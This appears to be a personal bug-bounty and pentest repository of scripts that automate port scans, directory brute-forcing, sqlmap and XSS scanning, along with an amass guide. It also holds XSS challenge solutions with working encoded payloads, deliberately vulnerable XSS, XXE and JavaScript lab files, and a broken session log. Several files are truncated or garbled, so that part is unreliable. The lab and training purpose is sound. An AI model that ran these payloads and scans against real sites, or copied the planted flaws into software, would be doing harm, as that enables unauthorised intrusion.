    # Run Eyewitness scan (--single takes one host/URL)
    eyewitness --web --threads=10 --no-prompt --prepend-https --single "$target" > eyewitness_output.txt

    # Run Nuclei scan (nuclei takes its target via -u)
    nuclei -t templates/web-content/all-vulns.yaml -t templates/web-content/common-dirs.yaml -u "$target" > nuclei_output.txt

    # Run Nikto scan
    nikto -h "$target" > nikto_output.txt
fi

--------------------------------------------------------------------------------
/Scripts/goScan.go:
--------------------------------------------------------------------------------
package main

import (
	"bufio"
	"encoding/binary"
	"fmt"
	"net"
	"os"
	"strings"
	"sync"
	"time"
)

// ipv4ToUint32 and uint32ToIPv4 replace the net.IPToBigInt / net.BigIntToIP calls
// in the original, which do not exist in Go's standard library.
func ipv4ToUint32(ip net.IP) (uint32, bool) {
	v4 := ip.To4()
	if v4 == nil {
		return 0, false
	}
	return binary.BigEndian.Uint32(v4), true
}

func uint32ToIPv4(n uint32) net.IP {
	b := make([]byte, 4)
	binary.BigEndian.PutUint32(b, n)
	return net.IP(b)
}

// expandRange turns "a.b.c.d-e.f.g.h" into every address of that inclusive range.
func expandRange(input string) ([]string, error) {
	parts := strings.SplitN(input, "-", 2)
	if len(parts) != 2 {
		return nil, fmt.Errorf("not a range: %q", input)
	}
	start, ok1 := ipv4ToUint32(net.ParseIP(strings.TrimSpace(parts[0])))
	end, ok2 := ipv4ToUint32(net.ParseIP(strings.TrimSpace(parts[1])))
	if !ok1 || !ok2 || start > end {
		return nil, fmt.Errorf("invalid IPv4 range: %q", input)
	}
	var ips []string
	for i := start; ; i++ {
		ips = append(ips, uint32ToIPv4(i).String())
		if i == end {
			break
		}
	}
	return ips, nil
}

func scanPort(address string, port int, wg *sync.WaitGroup, sem chan struct{}) {
	defer wg.Done()
	defer func() { <-sem }()

	conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", address, port), time.Second*10)
	if err != nil {
		return
	}
	conn.Close()
	fmt.Println(address, "Port", port, "is open.")
}

func main() {
	fmt.Println("Enter IPs or a range of IPs (e.g. 192.168.1.1-192.168.1.100)")
	scanner := bufio.NewScanner(os.Stdin)
	scanner.Scan()
	input := scanner.Text()

	var ipAddresses []string
	if strings.Contains(input, "-") {
		var err error
		ipAddresses, err = expandRange(input)
		if err != nil {
			fmt.Println(err)
			os.Exit(1)
		}
	} else {
		ipAddresses = strings.Fields(input)
	}

	start := time.Now()

	fmt.Println("Starting port scan on targets:", ipAddresses)

	// The original launched one goroutine per port (65535 per host at once), which
	// exhausts file descriptors; the semaphore bounds the number of in-flight dials.
	sem := make(chan struct{}, 512)
	var wg sync.WaitGroup
	for _, address := range ipAddresses {
		for port := 1; port <= 65535; port++ {
			wg.Add(1)
			sem <- struct{}{}
			go scanPort(address, port, &wg, sem)
		}
	}
	wg.Wait()

	elapsed := time.Since(start)
	fmt.Println("Port scan completed in", elapsed)
}

--------------------------------------------------------------------------------
/Scripts/gobuster.sh:
--------------------------------------------------------------------------------
#!/bin/bash
helpFunction()
{
   echo ""
   echo "Usage: $0 -u http://bla.domain.com/ [-w wordlist] [-m mode] [-f domainlist]"
   echo -e "\t-u url(http://bla.domain.com/)"
   echo -e "\t-w Wordlist, default /Users/wesleythijs/Documents/BugBounties/SecurityTesting/wordlists/dirlist.txt"
   echo -e "\t-f domain list, leave empty if you want to do a single domain"
   echo -e "\t-m mode, default dir mode"
   exit 1 # Exit script after printing help
}

# "f:" was missing from the original option string, so -f was never parsed.
# Note that parameterF is still not used below.
while getopts "u:w:m:f:" opt
do
   case "$opt" in
      u ) parameterU="$OPTARG" ;;
      w ) parameterW="$OPTARG" ;;
      m ) parameterM="$OPTARG" ;;
      f ) parameterF="$OPTARG" ;;
      ? ) helpFunction ;; # Print helpFunction in case parameter is non-existent
   esac
done

if [ -z "$parameterU" ]
then
   helpFunction
fi

if [ -z "$parameterW" ]
then
   parameterW="/Users/wesleythijs/Documents/BugBounties/SecurityTesting/wordlists/dirlist.txt"
fi

if [ -z "$parameterM" ]
then
   parameterM="dir"
fi

# gobuster 3.x expects the mode as the first argument
gobuster "$parameterM" -u "$parameterU" -w "$parameterW" -k

--------------------------------------------------------------------------------
/Scripts/initialScan.sh:
--------------------------------------------------------------------------------
#!/bin/bash
tput setaf 2;
echo "=========================================================="
echo "Welcome to my Nub Script for automating Your initial scan of a domain."
echo ""
echo "Make sure you have nmap installed"
echo ""
echo ""
echo "Usage: $0 -a true/[EMPTY] -h domain.com -o main-site"
echo -e "\t-h Host(bla.domain.com or domain.com)"
echo -e "\t-o OutputName"
echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true"
echo "=========================================================="
tput sgr0;

helpFunction()
{
   echo ""
   echo "Usage: $0 -a true/[EMPTY] -h domain.com -o main-site"
   echo -e "\t-h Host(bla.domain.com or domain.com)"
   echo -e "\t-o OutputName"
   echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true"
   exit 1 # Exit script after printing help
}

while getopts "h:o:a:" opt
do
   case "$opt" in
      h ) parameterH="$OPTARG" ;;
      o ) parameterO="$OPTARG" ;;
      a ) parameterA="$OPTARG" ;;
      ? ) helpFunction ;; # Print helpFunction in case parameter is non-existent
   esac
done

# Print helpFunction in case parameters are empty
if [ -z "$parameterH" ] || [ -z "$parameterO" ]
then
   echo "Some or all of the parameters are empty";
   helpFunction
fi

#if advanced is set do a full portscan
if [ "$parameterA" == "true" ]
then
   echo "Scanning all ports...-p- -sC -sV -oA"
   nmap -p- -sC -sV -oA "$parameterO" "$parameterH"
else
   echo "quick nmap scan..."
   nmap -sC -sV -oA "$parameterO" "$parameterH"
fi

--------------------------------------------------------------------------------
/Scripts/portscan-result-basic-comparer.py:
--------------------------------------------------------------------------------
import subprocess


def run_scan(target_host, scan_tool):
    # Each branch runs one scanner and pulls port numbers out of its stdout.
    # The `"open" in line` test is coarse: it also matches "open|filtered" states
    # and any service name or banner containing the word.
    if scan_tool == "nmap":
        result = subprocess.run(["nmap", "-sS", target_host], capture_output=True, text=True)
        ports = []
        for line in result.stdout.split("\n"):
            if "open" in line:
                port = line.split("/")[0]
                ports.append(port)
        return ports
    elif scan_tool == "masscan":
        result = subprocess.run(["masscan", target_host], capture_output=True, text=True)
        ports = []
        for line in result.stdout.split("\n"):
            if "open" in line:
                port = line.split(" ")[3].split("/")[0]
                ports.append(port)
        return ports
    elif scan_tool == "recon-ng":
        result = subprocess.run(["recon-ng", "--no-check", "-m", "scanner/portscan/tcp", "--workspace", "default", "-e", f"RHOSTS={target_host}"], capture_output=True, text=True)
        ports = []
        for line in result.stdout.split("\n"):
            if "open" in line:
                port = line.split(" ")[2]
                ports.append(port)
        return ports
    else:
        return []


def compare_scans(target_host):
    nmap_ports = run_scan(target_host, "nmap")
    masscan_ports = run_scan(target_host, "masscan")
    recon_ports =
run_scan(target_host, "recon-ng") 35 | print(f"Nmap found the following open ports: {nmap_ports}") 36 | print(f"Masscan found the following open ports: {masscan_ports}") 37 | print(f"Recon-ng found the following open ports: {recon_ports}") 38 | common_ports = set(nmap_ports) & set(masscan_ports) & set(recon_ports) 39 | if common_ports: 40 | print(f"The following ports were found open by all three tools: {list(common_ports)}") 41 | else: 42 | print("No common open ports were found by all three tools.") 43 | 44 | if __name__ == "__main__": 45 | target_host = input("Enter the target host: ") 46 | compare_scans(target_host) 47 | -------------------------------------------------------------------------------- /Scripts/portscan-runtime-comparer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Check if the required parameters are provided 4 | if [ $# -ne 1 ]; then 5 | echo "Usage: $0 " 6 | exit 1 7 | fi 8 | 9 | # Define the target host 10 | target_host=$1 11 | 12 | # Define the current date and time 13 | current_time=$(date +%s) 14 | 15 | # Run Nmap 16 | start_nmap=$(date +%s) 17 | nmap_ports=$(nmap -sS $target_host | grep open | awk '{print $1}' | tr '\n' ',' | sed 's/,$//') 18 | end_nmap=$(date +%s) 19 | nmap_time=$((end_nmap - start_nmap)) 20 | 21 | # Run Masscan 22 | start_masscan=$(date +%s) 23 | masscan_ports=$(masscan $target_host | grep open | awk '{print $3}' | tr '\n' ',' | sed 's/,$//') 24 | end_masscan=$(date +%s) 25 | masscan_time=$((end_masscan - start_masscan)) 26 | 27 | # Run Recon-ng 28 | start_recon=$(date +%s) 29 | recon_ports=$(recon-ng --no-check -m scanner/portscan/tcp --workspace default -e RHOSTS=$target_host | grep open | awk '{print $2}' | tr '\n' ',' | sed 's/,$//') 30 | end_recon=$(date +%s) 31 | recon_time=$((end_recon - start_recon)) 32 | 33 | # Print the results 34 | echo "Nmap took $nmap_time seconds to run and found the following open ports: $nmap_ports" 35 | echo "Masscan took 
$masscan_time seconds to run and found the following open ports: $masscan_ports" 36 | echo "Recon-ng took $recon_time seconds to run and found the following open ports: $recon_ports" 37 | -------------------------------------------------------------------------------- /Scripts/resources.txt: -------------------------------------------------------------------------------- 1 | https://www.darkreading.com/rss_simple.asp 2 | https://threatpost.com/feed/ 3 | https://www.schneier.com/blog/atom.xml 4 | https://nakedsecurity.sophos.com/feed/ 5 | https://www.zdnet.com/topic/security/rss.xml 6 | https://www.bleepingcomputer.com/feed/ 7 | https://www.csoonline.com/index.rss 8 | https://www.wired.com/category/security/feed/ 9 | https://www.helpnetsecurity.com/feed/ 10 | https://securityaffairs.co/wordpress/feed 11 | https://www.securityweek.com/rss 12 | https://www.bankinfosecurity.com/rss.php 13 | https://www.cyberscoop.com/feed/ 14 | https://www.databreachtoday.com/rss.php 15 | https://www.fireeye.com/blog/threat-research/_jcr_content.feed 16 | https://www.infosecurity-magazine.com/rss/news/ 17 | https://www.securitymagazine.com/rss/topic/2236-cyber-security-news 18 | https://www.techrepublic.com/rssfeeds/topic/security/ 19 | https://blog.trendmicro.com/feed/ 20 | https://www.technologyreview.com/topic/cybersecurity/rss/ 21 | -------------------------------------------------------------------------------- /Scripts/scanMultipleDomains.sh: -------------------------------------------------------------------------------- 1 | helpFunction() 2 | { 3 | echo "" 4 | echo "Usage: $0 -a true/[EMPTY] -f domain.txt" 5 | echo -e "\t-f FileName(domains.txt or domain.lst)" 6 | echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true" 7 | exit 1 # Exit script after printing help 8 | } 9 | 10 | while getopts "f:a:" opt 11 | do 12 | case "$opt" in 13 | f ) parameterF="$OPTARG" ;; 14 | a ) parameterA="$OPTARG" ;; 15 | esac 16 | done 17 | 18 | #if advanced is set do a full 
portscan 19 | if [ "$parameterA" == "true" ] 20 | then 21 | echo "$parameterF" 22 | while read line; do 23 | echo "Starting: $line" 24 | sh initialScan.sh -h "$line" -o "$line" -a "true" 25 | done < "$parameterF" 26 | else 27 | echo "$parameterF" 28 | while read line; do 29 | echo "Starting: $line" 30 | sh initialScan.sh -h "$line" -o "$line" 31 | done < "$parameterF" 32 | fi 33 | -------------------------------------------------------------------------------- /Scripts/sqliList.sh: -------------------------------------------------------------------------------- 1 | helpFunction() 2 | { 3 | echo "" 4 | echo "Usage: $0 -a true/[EMPTY] -f domain.txt" 5 | echo -e "\t-f FileName(domains.txt or domain.lst)" 6 | echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true" 7 | exit 1 # Exit script after printing help 8 | } 9 | 10 | while getopts "f:a:" opt 11 | do 12 | case "$opt" in 13 | f ) parameterF="$OPTARG" ;; 14 | a ) parameterA="$OPTARG" ;; 15 | esac 16 | done 17 | 18 | while read line; do 19 | echo "Starting: $line" 20 | sqlmap -u "$line" >> "$parameterF-sqlmap.txt" 21 | done < "$parameterF" 22 | 23 | -------------------------------------------------------------------------------- /Scripts/techStream.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | import datetime 4 | 5 | # Read the list of cybersecurity resources from an external file 6 | with open("techStream/resources.txt", "r") as f: 7 | urls = f.read().splitlines() 8 | 9 | # Create a new HTML document 10 | html = "Cybersecurity Articles" 11 | 12 | # Loop through each URL and scrape the latest articles 13 | for url in urls: 14 | response = requests.get(url) 15 | soup = BeautifulSoup(response.content, features="xml") 16 | 17 | # Extract the title, link, and summary of the latest articles 18 | articles = soup.find_all("item")[:5] 19 | for article in articles: 20 | title = article.find("title").text 21 
| link = article.find("link").text 22 | summary = article.find("description").text 23 | 24 | # Add the title, link, and summary to the HTML document 25 | html += "

" + title + "

" 26 | html += "

" + summary + "

" 27 | 28 | # Close the HTML document 29 | html += "" 30 | 31 | # Save the HTML document to a file 32 | timestamp = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S") 33 | filename = f"techStream/cybersecurity-articles-{timestamp}.html" 34 | with open(filename, "w") as f: 35 | f.write(html) 36 | print(f"HTML document saved to (unknown)") 37 | -------------------------------------------------------------------------------- /Scripts/techStream/readme.md: -------------------------------------------------------------------------------- 1 | # Cybersecurity Articles 2 | This Python script scrapes the latest cybersecurity articles from a list of websites and outputs them to an HTML file. 3 | 4 | # Requirements 5 | - Python 3.x 6 | - requests library (pip install requests/pip3 install requests) 7 | - BeautifulSoup library (pip install beautifulsoup4/pip3 install beautifulsoup4) 8 | 9 | # Usage 10 | - Clone or download the repository. 11 | - Open the techStream/resources.txt file and add the URLs of the websites you want to scrape, one per line. 12 | - Open a terminal or command prompt and navigate to the directory containing the script. 13 | - Run the script using the command python techStream.py / python3 techStream.py 14 | - The latest articles from each website will be saved to an HTML file in the same directory as the script. 15 | 16 | # License 17 | This project is licensed under the MIT License. See the LICENSE file for details. 
--------------------------------------------------------------------------------
/Scripts/techStream/resources.txt:
--------------------------------------------------------------------------------
(identical copy of /Scripts/resources.txt above)
--------------------------------------------------------------------------------
/Scripts/techStream/techStream.py:
--------------------------------------------------------------------------------
(identical copy of /Scripts/techStream.py above)
--------------------------------------------------------------------------------
/Scripts/webapp_pentest.py:
--------------------------------------------------------------------------------
import shlex
import subprocess
import sys
from urllib.parse import urlparse

import requests
from bs4 import BeautifulSoup

def run_command(cmd):
    # shlex.split + subprocess keeps the URL out of a shell (os.system would interpret it)
    print(f"Executing: {cmd}")
    subprocess.run(shlex.split(cmd), check=False)

def check_cms(target_url):
    cms = None
    try:
        response = requests.get(target_url, timeout=10)
        soup = BeautifulSoup(response.content, 'html.parser')
        meta_generator = soup.find('meta', attrs={'name': 'generator'})

        if meta_generator and 'WordPress' in meta_generator['content']:
            cms = 'WordPress'
        elif meta_generator and 'Joomla' in meta_generator['content']:
            cms = 'Joomla'
    except Exception as e:
        print(f"Error while detecting CMS: {e}")

    return cms

def main():
    if len(sys.argv) != 2:
        print("Usage: python3 webapp_pentest.py <target_url>")
        sys.exit(1)

    target_url = sys.argv[1]
    # nmap scans a host, not a URL
    target_host = urlparse(target_url).hostname or target_url

    # Detect the CMS (WordPress or Joomla) if possible
    cms = check_cms(target_url)
    if cms:
        print(f"Detected CMS: {cms}")
    else:
        print("Could not detect CMS")

    # Step 1: Run Nmap to discover open ports and services
    nmap_cmd = f"nmap -sV -p- {target_host}"
    run_command(nmap_cmd)

    # Step 2: Run Nikto to scan for web application vulnerabilities
    nikto_cmd = f"nikto -h {target_url}"
    run_command(nikto_cmd)

    # Step 3: Run Dirb to find hidden files and directories
    dirb_cmd = f"dirb {target_url}"
    run_command(dirb_cmd)

    # Step 4: Run SQLMap to detect and exploit SQL injection vulnerabilities
    sqlmap_cmd = f"sqlmap -u {target_url} --batch --crawl=3"
    run_command(sqlmap_cmd)

    # Step 5: Run XSSer to find and exploit Cross-Site Scripting (XSS) vulnerabilities
    xsser_cmd = f"xsser --auto --url {target_url}"
    run_command(xsser_cmd)

    # Step 6: Run Wfuzz to fuzz web applications
    wfuzz_cmd = f"wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 {target_url}/FUZZ"
    run_command(wfuzz_cmd)

    # Step 7: Run Arachni to scan for web application vulnerabilities
    arachni_cmd = f"arachni {target_url} --output-only-positives --report-save-path arachni_report.afr"
    run_command(arachni_cmd)

    # Step 8: Run WPScan if the target is a WordPress site
    if cms == 'WordPress':
        wpscan_cmd = f"wpscan --url {target_url} --enumerate u"
        run_command(wpscan_cmd)

    # Step 9: Run JoomScan if the target is a Joomla site
    if cms == 'Joomla':
        joomscan_cmd = f"joomscan -u {target_url}"
        run_command(joomscan_cmd)

if __name__ == "__main__":
    main()

--------------------------------------------------------------------------------
/Scripts/xssList.sh:
--------------------------------------------------------------------------------
tput setaf 2;
echo "=========================================================="
echo "Welcome to my Nub Script for automating XSStrike"
echo ""
echo "Make sure you have Python3 installed and XSStrike/xsstrike.py in '$HOME'"
echo ""
echo "Usage: $0 -f domain.txt"
echo -e "\t-f FileName(domains.txt or domain.lst)"
echo "=========================================================="
tput sgr0;

helpFunction()
{
   tput setaf 2;
   echo ""
   echo "Usage: $0 -f domain.txt"
   echo -e "\t-f FileName(domains.txt or domain.lst)"
   tput sgr0;
   exit 1 # Exit script after printing help
}

while getopts "f:" opt
do
   case "$opt" in
      f ) parameterF="$OPTARG" ;;
      ? ) helpFunction ;;
   esac
done

# Print helpFunction in case parameters are empty
if [ -z "$parameterF" ]
then
   echo "Some or all of the parameters are empty";
   helpFunction
fi

while read line; do
   echo "Starting: $line"
   python3 "$HOME/XSStrike/xsstrike.py" -u "$line" >> "XSS_$parameterF.txt"
done < "$parameterF"

--------------------------------------------------------------------------------
/Scripts/zap-scan-order.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Define the host to be scanned
host=

# Define the location of the ZAP CLI installation
zap_cli_location=

# Define the output file location
output_file=

# Start ZAP
$zap_cli_location/zap-cli start

# Spidering the host
$zap_cli_location/zap-cli spider $host

# Running an AJAX spider
$zap_cli_location/zap-cli ajax-spider $host

# Wait for spidering to complete
$zap_cli_location/zap-cli wait -t 120

# Running a quick ZAP scan
$zap_cli_location/zap-cli quick-scan --spider --ajax --output-file $output_file/quick_scan_results.json $host

# Running a full ZAP scan
$zap_cli_location/zap-cli full-scan --spider --ajax --output-file $output_file/full_scan_results.json $host

# Stop ZAP
$zap_cli_location/zap-cli stop

--------------------------------------------------------------------------------
/Scripts/zapstrikemap/readme.md:
--------------------------------------------------------------------------------
## XSStrike:
- sudo apt-get update
- sudo apt-get install python3-pip
- sudo pip3 install XSStrike

## SQLMap
- sudo apt-get update
- sudo apt-get install sqlmap

## ZAP
- sudo apt-get update
- sudo apt-get install openjdk-8-jre
- sudo apt-get install zaproxy

## Run
- Change input file in script
- python3 strike.py

--------------------------------------------------------------------------------
/Scripts/zapstrikemap/strike.py:
--------------------------------------------------------------------------------
import subprocess

with open("urls.txt") as f:
    urls = f.read().splitlines()

for url in urls:
    print("Running XSStrike on:", url)
    with open("xsstrike_output_" + url.replace("/", "_") + ".txt", "w") as f:
        subprocess.run(["xsstrike", "-u", url], stdout=f, stderr=subprocess.STDOUT)
    print("Running sqlmap on:", url)
    with open("sqlmap_output_" + url.replace("/", "_") + ".txt", "w") as f:
        subprocess.run(["sqlmap", "-u", url, "--batch"], stdout=f, stderr=subprocess.STDOUT)
    print("Running OWASP ZAP on:", url)
    with open("zap_output_" + url.replace("/", "_") + ".txt", "w") as f:
        # "zap-cli start --quick-scan" is not valid; quick-scan is its own command and
        # --self-contained starts and stops the ZAP daemon around the scan
        subprocess.run(["zap-cli", "quick-scan", "--self-contained", url], stdout=f, stderr=subprocess.STDOUT)

--------------------------------------------------------------------------------
/SubDomainEnum.md:
--------------------------------------------------------------------------------
- [Usage And flow](#usage-and-flow)
  * [Amass](#amass)
    + [Installation](#installation)
      - [Requirements](#requirements)
      - [Steps](#steps)
    + [Running amass](#running-amass)
  * [Other general tools](#other-general-tools)
- [List of Tools](#list-of-tools)
  * [General Tools](#general-tools)
  * [Dictionary attacks](#dictionary-attacks)
  * [Permutation Scanning](#permutation-scanning)
  * [DNS Databases](#dns-databases)
  * [Checking SubDomain Status Code](#checking-subdomain-status-code)

Table of contents generated with markdown-toc

# Usage And flow
## Amass
First off, I like to use Amass. It will give me a great amount of results and usually makes the other tools seem like nubs.
### Installation
#### Requirements
- Brew needs to be installed
#### Steps

    brew tap caffix/amass
    brew install amass

### Running amass
Simple Enum:

    amass enum -d example.com

Intel:

    amass intel -org google

This will result in CIDR records, which can then be enumerated:

    amass intel -ip -src -cidr IP.IP.IP.IP

## Other general tools
We can run other tools like SubFinder, Findomain, dnssearch, ... to complete our list; for those see the GitHub pages.

# List of Tools
## General Tools
1. [Amass](https://github.com/OWASP/Amass)
2. [SubFinder](https://github.com/projectdiscovery/subfinder)
3. [Findomain](https://github.com/Findomain/Findomain)
4. [Sublist3r](https://github.com/aboul3la/Sublist3r)
5. [dnssearch](https://github.com/evilsocket/dnssearch)
6. [Sudomy](https://github.com/Screetsec/Sudomy)

## Dictionary attacks
1. [knockPy](https://github.com/guelfoweb/knock)
2. [DNSRecon](https://github.com/darkoperator/dnsrecon)
3. [MassDNS](https://github.com/blechschmidt/massdns)

## Permutation Scanning
1. [AltDNS](https://github.com/infosec-au/altdns)

## DNS Databases
1. [DNS Dumpster](https://dnsdumpster.com/)
2. [Shodan](https://snippets.shodan.io/c/83ldc9nef1Tp2R8C)
3. [Pentest-tools](https://pentest-tools.com/information-gathering/find-subdomains-of-domain)
4. [Rapid7 Forward DNS (FDNS)](https://opendata.rapid7.com/sonar.fdns_v2/)

## Checking SubDomain Status Code
1. [URLChecker](https://github.com/evanRubinsteinIT/URLChecker)
2. [HTTProbe](https://github.com/tomnomnom/httprobe)
3. [httpx](https://github.com/projectdiscovery/httpx)
4. [dnsx](https://github.com/projectdiscovery/dnsx)

--------------------------------------------------------------------------------
/THM_riddleme:
--------------------------------------------------------------------------------
First we need to reverse the code

ngnivilurstetavirparehtneremithW
to
Whtimerentheraprivatetsrulivingn

Now we need to split it on the known words
Wh timer en the ra private ts ru living n

And remove them
When the rats run
This is the first code

The second code can easily be decoded here:
https://www.dcode.fr/monoalphabetic-substitution

It's a monoalphabetic substitution with the following alphabet:
AZERTYUIOPQSDFGHJKLMWXCVBN

This gets:
thisisthecode

Enter both answers to unlock the code!

--------------------------------------------------------------------------------
/TheBasicsOf/JavaScript.js:
--------------------------------------------------------------------------------
// 1. Variables: We can store information in variables.

var name = "John"; // this is a string
let age = 25; // this is a number
const isStudent = true; // this is a boolean

// 2. Functions: A block of code designed to perform a particular task.

function greet(name) {
  console.log("Hello, " + name);
}

// Call the function
greet(name); // Outputs: "Hello, John"

// 3. Objects: JavaScript objects are containers for named values.

let student = {
  name: "John",
  age: 25,
  isStudent: true
};

// Access object properties
console.log(student.name); // Outputs: "John"

// 4. Arrays: A special type of object used for storing multiple values in a single variable.

let array = ["Apple", "Banana", "Cherry"];
console.log(array[0]); // Outputs: "Apple"

// 5. Loops: JavaScript supports different kinds of loops.

// This is a for loop
for (let i = 0; i < array.length; i++) {
  console.log(array[i]); // Outputs each fruit in the array
}

// 6. Conditional Statements: Used to perform different actions based on different conditions.

if (age >= 18) {
  console.log("You are an adult."); // Outputs: "You are an adult."
} else {
  console.log("You are a minor.");
}

// 7. Events: JavaScript's interaction with HTML is handled through events.

document.getElementById("myButton").onclick = function() {
  alert('Hello World!');
};

// This will alert "Hello World!" when the element with id "myButton" is clicked.

--------------------------------------------------------------------------------
/TheBasicsOf/JavaScriptExploits.js:
--------------------------------------------------------------------------------
(function() {
  'use strict';

  var secretApiToken = 'api1234secret'; // Token shouldn't be hard coded

  // Check for a common feature toggle that developers might forget to turn off
  var debugMode = false; // Developers might accidentally leave debug mode on

  var data = {
    userId: '',
    authToken: ''
  };

  function login(username, password) {
    // Passwords should never be sent in plaintext
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/api/login');
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.onload = function() {
      if (xhr.status === 200) {
        var userObj = JSON.parse(xhr.responseText);
        data.userId = userObj.userId;
        data.authToken = userObj.authToken;
      } else {
        console.log('Error logging in: ' + xhr.status);
      }
    };
    xhr.send(JSON.stringify({
      username: username,
      password: password
    }));
  }

  function setDebugMode(status) {
    // Vulnerability: Anyone can set debugMode
    debugMode = status;
    if (debugMode) console.log('Debug mode enabled');
  }

  function debugLog(msg) {
    // Logs should not be present in production
    if (debugMode) {
      console.log(msg);
    }
  }

  function getSecretApiToken() {
    // This function shouldn't exist - it's a big vulnerability
    return secretApiToken;
  }

  // Other normal application logic
  // ...

  // Expose some methods to the window object for external scripts
  window.login = login;
  window.setDebugMode = setDebugMode;
  window.getSecretApiToken = getSecretApiToken;

})();

--------------------------------------------------------------------------------
/XSS challenge room solutions:
--------------------------------------------------------------------------------
cheeseBlog-1 Basic reflected XSS on search page
Solution:

cheeseBlog-2 filtered reflected XSS on search page
Solution:

cheeseBlog-3 html tag injection into input
Solution: ' onmouseover=alert() '

cheeseBlog-4 almost everything except onclick is blocked
Solution:

cheeseBlog-11 It filters < in the first 10 characters
Solution: gdfhhgjhgjnhgjhgjghj

cheeseBlog-12 This is really hard, there is a hidden input field on the category page. This is vulnerable to attribute injection
Solution: ' accesskey=X onclick=alert(1) ' in the title field
Then you need to go to categories and press alt+shift+x
You can only have this ONCE on the page and it only works in FF. You can break all the code after it but people will start noticing.
x='

cheeseBlog-13
You need to do directory brute forcing to find images.php
There you need to enter the following attack vector;
This is because alert is blocked

cheeseBlog-14
A lot is filtered here
- You need a nullbyte SOMEWHERE in the payload (%00)
- No img tags BUT this is filtered BEFORE the lowercasing AND I am also filtering Img so you need to use iMg tag

- it will convert the search query to lowercase string

All of this is filtered AFTER toLowerCase
- no SVG allowed
- No scripts
- No alert
- No confirm
http://23.239.9.22/cheeseBlog-14/search.php?q=fdsfniose0dffdsfsdffds%3CiMg%2500src%3Dx%2500onerror%3Dprompt%28%29%3E

cheeseBlog-15
You will need double encoding here http://23.239.9.22/cheeseBlog-15/search.php?q=%25253cimg+src%3Dx%3E
%25 url decodes into %
%3c into <
%3e into >

--------------------------------------------------------------------------------
/labs/xss/XSS1.php:
--------------------------------------------------------------------------------
(PHP and HTML body lost in extraction)
--------------------------------------------------------------------------------
/labs/xss/XSS2.php:
--------------------------------------------------------------------------------
(PHP and HTML body lost in extraction)
--------------------------------------------------------------------------------
/labs/xss/XSSDOM.php:
--------------------------------------------------------------------------------
Select your favourite cheese:
(remaining markup and script lost in extraction)
--------------------------------------------------------------------------------
/labs/xss/XSSJS.php:
--------------------------------------------------------------------------------
<?php
// (opening lines lost in extraction; the surviving echo writes the GET parameter into a script block)
    echo "<script>document.write('" . $_GET['fname'] . "');</script>";
}
?>
(form markup lost in extraction)

In here we can see some JS

    document.write('" . $_GET['fname'] . "');

--------------------------------------------------------------------------------
/labs/xss/XSSTAG1.php:
--------------------------------------------------------------------------------
<?php
// (lines 1-3 lost in extraction; only the end of an echo statement survives)
";
}
?>
(form markup lost in extraction)
--------------------------------------------------------------------------------
/labs/xss/XSSTAG2.php:
--------------------------------------------------------------------------------
(PHP and HTML body lost in extraction)
--------------------------------------------------------------------------------
/labs/xss/XSSWL.php:
--------------------------------------------------------------------------------
(PHP and HTML body lost in extraction)
--------------------------------------------------------------------------------
/labs/xss/b:
--------------------------------------------------------------------------------
(body lost in extraction)
--------------------------------------------------------------------------------
/labs/xxe/a:
--------------------------------------------------------------------------------
(body lost in extraction)
--------------------------------------------------------------------------------
/labs/xxe/xxe.php:
--------------------------------------------------------------------------------
<?php
// (lines 1-10 and 12-18 lost in extraction; $dom is the DOMDocument that is used below
//  and $xmlfile holds the posted XML; LIBXML_NOENT | LIBXML_DTDLOAD is what makes this lab XXE-prone)
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
//Grab the data from the file
$cheese = simplexml_import_dom($dom);
$cheeseType = $cheese->cheeseType;
if($cheeseType==""){
    echo "Please make a POST request with the following data\
<cheese>
    <cheeseType>Test</cheeseType>
</cheese>";
}else{
    echo "I also LOVEEEE $cheeseType";
}

?>
--------------------------------------------------------------------------------
/last_session.json:
--------------------------------------------------------------------------------
[{"url": "http://labs.hackxpert.com:8348//idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\nMethod Not Allowed\nThe method is not allowed for the requested URL.\n", "content_type": "JSON"}]
Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

